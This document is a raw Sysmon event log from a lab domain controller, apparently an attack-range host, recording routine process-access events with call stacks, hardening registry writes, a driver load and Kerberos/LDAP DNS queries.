12:01:25.377{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003261Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.377{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003260Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.377{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003259Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.377{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003258Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.377{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0E00-00000000AE01}1080C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003257Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.377{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+396a|c:\windows\system32\SYSNTFY.dll+1fc3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+527f8|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003256Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.377{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003255Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003254Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000003253Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:01:25.377{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 10341000x80000000000000003252Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003251Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003250Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003249Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003248Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.377{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003247Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003246Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003245Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 644600x80000000000000003244Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:40.534C:\Windows\System32\drivers\xencrsh.sysMD5=8498E8240422067AF19398BA0C9E71BD,SHA256=8763BD78E6D2A5C4974EE2C917069C212FA6B5E138B1DFAF3D923EC7BDA8CCE0,IMPHASH=5A51E368D0D191BA922C89AD12551EF4trueAmazon Web Services, Inc.Valid 13241300x80000000000000003243Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:01:25.330{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\NTDS\Parameters\ldapserverintegrityDWORD (0x00000001) 13241300x80000000000000003242Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:01:25.330{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Netlogon\Parameters\requiresignorsealDWORD (0x00000001) 13241300x80000000000000003241Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:01:25.330{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\LanmanServer\Parameters\requiresecuritysignatureDWORD (0x00000001) 13241300x80000000000000003240Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:01:25.330{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\LanmanServer\Parameters\enablesecuritysignatureDWORD (0x00000001) 13241300x80000000000000003239Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1101SetValue2021-03-31 12:01:25.330{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001) 10341000x80000000000000003238Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.049{266CAFBE-646C-6064-1500-00000000AE01}13162180C:\Windows\system32\svchost.exe{266CAFBE-6494-6064-7F00-00000000AE01}4024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000003237Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6494-6064-7F00-00000000AE01}4024C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003236Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.018{266CAFBE-6495-6064-8000-00000000AE01}42683844C:\Windows\system32\conhost.exe{266CAFBE-6494-6064-7F00-00000000AE01}4024C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 22542200x80000000000000003235Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.728{266CAFBE-646A-6064-0B00-00000000AE01}856_kpasswd._udp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003234Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.726{266CAFBE-646A-6064-0B00-00000000AE01}856_kpasswd._tcp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003233Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.724{266CAFBE-646A-6064-0B00-00000000AE01}856_kerberos._udp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003232Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.722{266CAFBE-646A-6064-0B00-00000000AE01}856_gc._tcp.Default-First-Site-Name._sites.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003231Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.720{266CAFBE-646C-6064-1100-00000000AE01}1200win-dc-892.attackrange.local0fe80::8c4d:e56a:c9ce:fd2b;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000003230Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.720{266CAFBE-646A-6064-0B00-00000000AE01}856_gc._tcp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003229Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.718{266CAFBE-646A-6064-0B00-00000000AE01}856_kerberos._tcp.Default-First-Site-Name._sites.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003228Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.716{266CAFBE-646A-6064-0B00-00000000AE01}856_kerberos._tcp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003227Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.715{266CAFBE-646A-6064-0B00-00000000AE01}856_kerberos._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003226Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.713{266CAFBE-646A-6064-0B00-00000000AE01}856_kerberos._tcp.dc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003225Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.711{266CAFBE-646A-6064-0B00-00000000AE01}856gc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003224Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.709{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.Default-First-Site-Name._sites.gc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003223Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.707{266CAFBE-647D-6064-3600-00000000AE01}2704win-dc-892.attackrange.local0fe80::8c4d:e56a:c9ce:fd2b;::ffff:10.0.1.14;C:\Windows\System32\dfssvc.exe 22542200x80000000000000003222Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.707{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.gc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003221Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.705{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.9501type: 6 